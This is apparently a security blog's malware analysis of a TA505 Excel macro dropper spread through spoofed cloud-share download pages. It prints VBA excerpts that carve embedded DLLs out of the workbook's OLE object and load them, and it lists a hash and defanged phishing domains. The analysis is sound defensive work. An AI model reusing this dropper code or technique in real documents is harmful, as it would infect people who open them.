TA505 campaign: Macro Analysis

Starting September we have seen a rise in campaigns from TA505 threat actor. They send emails in bulk with spoofed messages regarding hosted files on (spoofed) cloud share services. The sites look very similar to the real deal and allow download of MS Excel files and, in some cases, Word Docs, which contain VBA macros that drop and execute malicious DLLs. These campaigns are dropping RATs and downloaders. More IOCs will be provided at the end of the blog but only one example is covered in this blogpost. After all we have to do some ‘evil code analysis.’

This particular sample ‘N98300_10.21.19.xls’ (6e31b0051adf99888d50d8679c329ffb9b41991e04d8b639cc01f13e5f46656f) was downloaded from hxxps://dl2.dropbox-er[.]com/?BSoFW, which spoofed a dropbox file download page.

pagexls

As soon as the file is downloaded and opened the below event should have triggered; however, due to a compilation error it stops.

1sem_code.png2compiler_error.png

Since PtrSafe is being used in both the #if and #else directives statement blocks it will fail to compile if run with VBA 6 or earlier. This macro is not backward compatible, probably a mistake from the malware author.

ptrsafe.png

If we take a look at the directives the only difference is PtrSafe keywords in Win64 case and the dll file names, libDxdiag2.dll vs libDxdiag1.dll.

The function below in Module1 initializes some variables.

Public Sub AppStart()
Dim PointerNull As Object
Dim SpecialPath As String
Set PointerNull = CreateObject("WScri" + "pt.Shell") '<--WScript.Shell object

UserForm6.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm6.TextBox1.Tag + "%")
'^ contains %Temp%

UserForm6.TextBox2.Tag = PointerNull.SpecialFolders(UserForm6.TextBox2.Tag)
'^ contains %AppData%\Roaming\Microsoft\Windows\Templates

ChDir (UserForm6.TextBox1.Tag)

UserForm1.show
End Sub

The function ReplaceCurrentModule() in Module5 holds most of the meat of this malicious macro.

It concatenates some variables and strings to store filenames:

TextBox1Tag = %Temp%\libProject.xlsx
ZipName = %Temp%\libProject.xlsx.zip
ZipFolder = %Temp%
nm = %AppData%\Roaming\Microsoft\Windows\Templates\libDxdiag1
CNPK = 278528
FilePosition = 1

Now the below directives may change some of the above values based on the platform:

#If Win64 Then
    nm = UserForm6.TextBox2.Tag + "\libDxdiag2"
    CNPK = 252928
    FilePosition = 2

And after the end of the directives .dll is appended to the nm variable.

The function KillArray in Module6 cleans all the files just in case they are already present in the above temporary locations.

'KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, nm
Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Then function ReplaceFile saves this workbook as %Temp%\libProject.xslx with file format 51 (xlOpenXMLWorkbook). More on excel file format enumeration here.

After that the same file is copied to the same folder with zip extension.

FileCopy TextBox1Tag, ZipName

In the next part of this function the ole object is copied out of the zip file location xl\embeddings\oleObject1.bin to the ZipFolder(%Temp%), as this contains the dll files.

Next the below function call from Module1 is executed:

NewValuje ZipFolder + "\oleObject" + "1" + ".b" + "in", nm, CNPK, FilePosition

This function is where it copies the embedded dll data out to the dll file. All it does is check for the MZ header and then start copying.
The function params are:
s = C:\Users\REM\AppData\Local\Temp\oleObject1.bin (source to copy from)
nm = C:\Users\REM\AppData\Roaming\Microsoft\Windows\Templates\libDxdiag1.dll (dll to copy to)
fl = 278528 (file length)
Variable_6 = 1 (or 2; file position) there are 2 DLLs embedded in the xls

Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)  '<-- decimal 77 = M
    Variable_5(2) = CByte(40 + 50)  '<-- decimal 90 = Z
    Variable_5(1 + 2) = CByte(40 + 104)  '<-- decimal 144
    'which means the Variable_5 first 3 bytes are 4d 5a 90
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then      'if the first file position in case of 32 bit
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1               'if the second file position in case of 64 bit
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1

Then the DLL file is written to the location in nm variable.

At the end ReplaceCurrentModule() loads the DLL using LoadLibraryW

GetName2 (nm)  'Already imported

then calls the dll GetName function, which merely runs DLLEntryPoint.


The x64 version appears to be UPX packed.

Now this macro doesn’t do anything out of the ordinary except the social engineering part where it shows user form image that resembles install of office components as if something had failed.

Out of the most variants I have seen of this macro the above sample is the only one with the compilation error.

I use urlscan.io to hunt for similar URLs, like this query https://urlscan.io/search/#domain%3A%20googledrive-*. One can use similar queries to look for these domains. However, due to possible urlscan.io evasion the TA505 domains redirect to apple.com. But I have found this to be a good indicator that the domain is from the same group.

Below are the other domains that look like cloud storage file download pages:

Dropbox:
dropbox-er[.]com
dropbox-download[.]com
dropbox-en[.]com
dropbox-eu[.]com

OneDrive:
onedrive-sd[.]com
onedrive-sn[.]com
onedrive-sdn[.]com
onedrive-cdn[.]com
onedrive-download-en[.]com
onedrive-download[.]com
cdn-onedrive-live[.]com
onedrive-en-live[.]com
onedrive-fn[.]com

Google Drive:

googledrive-eu[.]com
googledrive-en[.]com
googledrive-gb[.]com
googledrive-download[.]com

Box:
box-en[.]com
box-cnd[.]com <– using onehub.com

Other lesser known services like owncloud and sync have also been spoofed.
own-eu-cloud[.]com
syncdownloading[.]com
sync-share[.]com

Thanks to @kyleehmke and @James_inthe_box for keeping track of this campaign and tweeting the latest IOCs.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s